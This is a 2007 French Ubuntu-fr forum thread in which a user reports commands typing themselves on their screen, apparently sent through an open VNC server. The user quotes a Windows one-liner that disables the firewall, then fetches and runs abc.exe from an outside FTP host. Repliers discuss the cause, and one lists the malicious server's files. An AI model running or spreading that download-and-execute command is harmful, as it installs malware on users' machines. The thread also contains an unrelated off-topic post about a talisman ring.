truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi

bloblux · Le 18/03/2007, à 15:48

Bonjour,
Il s'est passer un truc étrange tout à l'heure... J'était entrain d'écrire un mail sous hotmail est mon curseur c'est mis a écrire des trucs tout seul .... c'est bisard, non ? Voilà ce que ca a écrit :

%systemroot%_system32_cmd.exe
cmd /c net stop SharedAccess &echo open 86.71.11R4.249 642 e>
>T%systemroot%_system32_cmd.exe
cmd /c echo open ftpz.redirectme.net 21 >> ik &echo user jas jas >nary >> ik &echo get abc.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &abc.exe &exit

J'ai rien compris ca veut dire quoi ? c'est quoi ? Est ce que quelqu'un peu m'expliquer ?
Merci beaucoup

Dernière modification par bloblux (Le 19/03/2007, à 22:29)

Gari · Le 18/03/2007, à 15:54

A vue de nez, je dirai une tentative de faire exécuter du code Windows. Surement un virux. Par contre, le fait que ça arrive sous Ubuntu ça me laisse perplexe.

bloblux · Le 18/03/2007, à 16:05

Ben oui moi aussi, mais pourtant mon pc est entierement sous Ubuntu.... Si c'est un virus windows, je ne risque rien ? c'est bien ca ? Mais si c'est un virus qui fonction sous Ubuntu, je risque quoi ? Je doit malarté, faire un truc ? Vous en pensez quoi ?

Compte anonymisé · Le 18/03/2007, à 16:37

%systemroot%_system32_cmd.exe
cmd /c net stop SharedAccess &echo open 86.71.11R4.249 642 e>
>T%systemroot%_system32_cmd.exe
cmd /c echo open ftpz.redirectme.net 21 >> ik &echo user jas jas >nary >> ik &echo get abc.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &abc.exe &exit

C'est des commandes MS-Dos

Vu que les commandes MS-Dos ne peuvent être utilisé que sous Windows, je pense que t'a installé un virus windows en utilisant wine ou un logiciel du style.

Si c'est un virus windows, je ne risque rien ? c'est bien ca ?

Ben théoriquement non

alors si c'est sa, normallement un :

killall wineserver

devrais réglé le problème
a+

K3g3rUn3kU · Le 18/03/2007, à 17:12

enorme
non a part via wine tu risque rien
parce que avec wine je me souviens qu'une fois un gars avait attrapé Win32.Klez32MM
avec une disquette donc mefie toi wine c a double tranchant : tu as le beurre mais aussi le rance du beurre (et oui windows c'est du beurre rance)

bloblux · Le 18/03/2007, à 17:14

Ok mais je fait comment exactement pour faire un :

killall wineserver ?

Je suis un peu nule en informatique....

Merci

Nb : Sinon je ne me rapelle pas avoir utiliser un truc wine mais bon.... j'ai pas mal d'amis qui se servent de mon pc alors peut être.....
D'ailleur excuser ma question de débutante mais c'est quoi wine ?

Dernière modification par bloblux (Le 18/03/2007, à 17:25)

Hedj-our · Le 18/03/2007, à 17:37

En tapant cela dans un terminal

Application =>Accessoir=> terminal

bloblux · Le 18/03/2007, à 17:47

Ok, je l'ai fait mais il me répond :

wineserver: aucun processus tué

Ca veut dire quoi qui y a rien de win dans mon pc ou qu'il arrive pas à le tuer ?

tylhdar · Le 18/03/2007, à 18:37

tu n'est pas le seul
edit: sinon ça pourrait très bien être un un code javascripts contenu dans un mail qui a taper ces lignes, donc aucun danger...

Dernière modification par tylhdar (Le 18/03/2007, à 19:13)

bloblux · Le 18/03/2007, à 21:04

j'ai regarder le lien et ça à l'aire de ressembler à ca... même si j'ai pas tout compris vue que c'est en anglais !!! .... merci tylhdar

Alors je met un résolu devent mon poste ?

Dernière modification par bloblux (Le 18/03/2007, à 21:06)

bloblux · Le 19/03/2007, à 19:32

Bon on va dire que c'est résolu ou du moin que je sais d'ou ca vient mais ça continu et sa à l'aire de plus en plus fréquent !
Si quelqu'un à une idée pour que cela cesse.... Je suis prennante....
Je vai laissé le topic encore ouvert pour aujourd'hui des fois que....

Shirow · Le 19/03/2007, à 21:24

Pôvre virus, zêtes pas sympa avec lui ...

bloblux · Le 19/03/2007, à 22:27

Bon alors là c'est la panic voilà que le curseur de la souris si met aussi.... il bouge tout seul et fait même des commandes .... Qu'est ce que ca veux dire ??? Quelqu'un peut il prendre possétion de mon ordi a distance ??? Ou est ce un virus ??? Quelqu'un a une idée sur ce que je peut faire ?

hunterfett · Le 19/03/2007, à 22:36

Hello,

Bon, après une petite visite sur le site ftp qui héberge ce cheval de troie, voilà ce que l'on trouve :

ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-r--r--r--   1 jas      www         52224 Mar 17 19:42 abc.exe
-r--r--r--   1 jas      www         52224 Mar 17 19:42 cba.exe
drwxr-xr-x   3 jas      www          4096 Mar 17 19:43 honeybot
226 Transfer complete.

Il y a bien un fichier cba.exe qui doit être téléchargé et exécuté sur le PC. Mais le script étant composé de commandes MS-DOS, il ne doit pas y avoir de risque sous Linux.

A+

Compte anonymisé · Le 19/03/2007, à 22:42

peut-être as tu démarre un serveur style vnc?

peut-être a tu installé un logiciel venait d'un site peu connu avant que tu commence a avoir tes problèmes?

Les problèmes vienne aussi quand tu n'est pas connecté a internet? (comme sa tu sais si c'est un virus ou un gars qui esssaye de prendre possésion de ton ordi)

tylhdar · Le 21/03/2007, à 14:33

reformate tout
(c'est juste ce que je ferait a ta place...)

Dernière modification par tylhdar (Le 21/03/2007, à 14:33)

$ianur391 · Le 22/03/2007, à 00:56

la drogue c'est pas bon

tylhdar A ECRIT
reformate tout
(c'est juste ce que je ferait a ta place...)

moi aussi rien de drole jamais drole quand il faut reformater

ba · Le 27/03/2007, à 17:12

La cause: tu as un serveur VNC sur ta machine non protégé par mot de passe.

Supprimes ce service VNC, mets un mot de passe, met un firewall, mais fais quelquechose, quoi!

ce virus circule depuis pas mal de temps quand meme, faudrait faire gaffe un peu, quoi!

Johnny1989 · Le 27/03/2007, à 20:41

La bague Atlante est un bijoux ayant suposément des facultés protectrices. Elle aurait aussi la faculté d'améliorer l'état général de la santé et de favoriser les contacts métaphysiques. Ses soidisants pouvoirs varieraient selon la main et le doigt où elle est portée.

Pour prouver l'efficasité de la bague l'auteur du texte sur la bague atlante utilise un lien causal douteu disant qu'après la découverte de la chambre mortuaire du pharaon Tout Ankh Amon, 17 ou 18 personnes (selon les versions) trépassèrent dans les jours et mois qui suivirent. Et le seul de l'équipe qui échappa à la malédiction serait
Howard Carter, celui qui mena les fouilles du début jusqu'à la fin, inventoria et déménagea le trésor trouvé, se serait aussi lui le premié à avoir entré dans la chambre du pharaon et à voir la momie. Il aurait été sauvé à cause d'un talisman qui le protégeait, la bague atlante. L'auteur dit que si Howard Carter aurait été sauvé de la soidisant malédiction ce serait à cause qu'il portait un talisman qui le protégeait. L'auteur ne peut prouver la corrélation entre les deux phénomènes. Pourquoi est-ce que c'est sa bague qui l'aurait protégé de la malédiction, s'il y avait vraiment malédiction? Ce ne pourrait pas être à cause d'une formule magique qu'il aurait prononcé ou d'un porte bonheur qu'il portait à ce moment?

Pour prouver que la bague atlante fonctionne, l'auteur du texte utilise aussi un appel à la tradition disant que les pouvoirs des ondes de forme qui s'en dégagent étaient connus et utilisés en Égypte il y a plus de 5 000 ans. Le simple fait que l'utilisation de la bague atlante se fait depuis 5 000 ans prouverait son fonctionnement. Ce n'est pas parce cette croyance est ancienne qu'elle est vraie. Pendant combien de temps avons-nous cru que la terre était plate et est-ce que c'était vrai?

sonal · Le 27/03/2007, à 20:46

donc tu penses qu'il existe des "virus" actifs contre linux ?

cheos · Le 29/03/2007, à 11:07

Je dirais plutôt que si on laisse un service d'accès à distance ouvert aux quatre vents, on prend le risque de voir une personne mal intentionnée ou un programme venir tenter de fouiller la machine.

Tatane_ESIEE · Le 06/11/2007, à 14:27

bonjour a tous, j'ai eu vraisemblablement le même probleme que vous, un mec est passé ( au vu des logs impréssionnants de tentatives ssh ) par mon ssh qui pourtant ( du moins je le pense ) est configuré correctement et a tapé les commandes citées plus hauts. Cepandant ces commandes se sont tapées dans un tableur ( lol ). J'ai fait un check avec chkrootkit et j'ai configuré iptables .

PS voici les addresses d'ou il a tenté de se connecté en testant des nom d'utilisateurs administrateurs par defaults et a réussi a rentrer avec le compte "nobody":

Nov 2 14:06:04 220.248.40.13
Nov 2 22:09:26 60.28.222.154
Nov 4 13:08:33 61.27.104.2
Nov 4 20:52:04 70.46.119.34

je ne sait pas trop a quoi correspond ce compte, j'ai changé mes mots de passes, si vous en savez plus dites moi.

Tatane

Ubuntu-fr

Navigation

Liens de recherche

Annonce

#1 Le 18/03/2007, à 15:48

truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi

#2 Le 18/03/2007, à 15:54

Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi

#3 Le 18/03/2007, à 16:05

Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi

#4 Le 18/03/2007, à 16:37

Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi

#5 Le 18/03/2007, à 17:12

Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi

#6 Le 18/03/2007, à 17:14

Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi

#7 Le 18/03/2007, à 17:37

Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi

#8 Le 18/03/2007, à 17:47

Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi

#9 Le 18/03/2007, à 18:37

Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi

#10 Le 18/03/2007, à 21:04

Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi

#11 Le 19/03/2007, à 19:32

Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi

#12 Le 19/03/2007, à 21:24

Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi

#13 Le 19/03/2007, à 22:27

Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi

#14 Le 19/03/2007, à 22:36

Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi

#15 Le 19/03/2007, à 22:42

Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi

#16 Le 21/03/2007, à 14:33

Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi

#17 Le 22/03/2007, à 00:56

Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi

#18 Le 27/03/2007, à 17:12

Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi

#19 Le 27/03/2007, à 20:41

Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi

#20 Le 27/03/2007, à 20:46

Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi

#21 Le 29/03/2007, à 11:07

Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi

#22 Le 06/11/2007, à 14:27

Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi

Pied de page des forums